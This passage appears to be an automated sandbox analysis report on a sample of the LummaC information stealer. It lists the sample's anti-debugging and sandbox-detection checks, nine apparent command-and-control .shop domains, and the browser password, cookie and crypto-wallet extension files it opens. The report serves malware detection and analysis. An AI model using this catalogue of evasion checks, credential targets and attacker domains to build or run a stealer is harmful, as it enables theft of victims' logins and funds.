            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0080C72D rdtsc 0_2_0080C72D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe TID: 2076Thread sleep time: -150000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe TID: 1892Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: x6VtGfW26X.exe, x6VtGfW26X.exe, 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1824627069.00000000011E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1824627069.00000000011E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
            Source: x6VtGfW26X.exe, 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1824627069.00000000011B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeThread information set: HideFromDebuggerJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (window names)
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: SICE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0080C72D rdtsc 0_2_0080C72D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007ED910 LdrInitializeThunk,0_2_007ED910

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: x6VtGfW26X.exeString found in binary or memory: cloudewahsj.shop
            Source: x6VtGfW26X.exeString found in binary or memory: rabidcowse.shop
            Source: x6VtGfW26X.exeString found in binary or memory: noisycuttej.shop
            Source: x6VtGfW26X.exeString found in binary or memory: tirepublicerj.shop
            Source: x6VtGfW26X.exeString found in binary or memory: framekgirus.shop
            Source: x6VtGfW26X.exeString found in binary or memory: wholersorie.shop
            Source: x6VtGfW26X.exeString found in binary or memory: abruptyopsn.shop
            Source: x6VtGfW26X.exeString found in binary or memory: nearycrepso.shop
            Source: x6VtGfW26X.exeString found in binary or memory: fancywaxxers.shop
            Source: x6VtGfW26X.exe, x6VtGfW26X.exe, 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: {Program Manager
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E8040 cpuid 0_2_007E8040
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: x6VtGfW26X.exe, 00000000.00000003.1788826248.00000000059B4000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1788522082.00000000059A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
            Source: x6VtGfW26X.exe, 00000000.00000003.1782603529.000000000126D000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1824627069.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: x6VtGfW26X.exe PID: 6940, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: x6VtGfW26X.exe, 00000000.00000003.1768827006.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: x6VtGfW26X.exe, 00000000.00000003.1788887914.0000000001252000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: n":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfhp%
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
            Source: x6VtGfW26X.exe, 00000000.00000003.1768827006.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: x6VtGfW26X.exe, 00000000.00000003.1768756275.000000000125B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to steal Crypto Currency Wallets
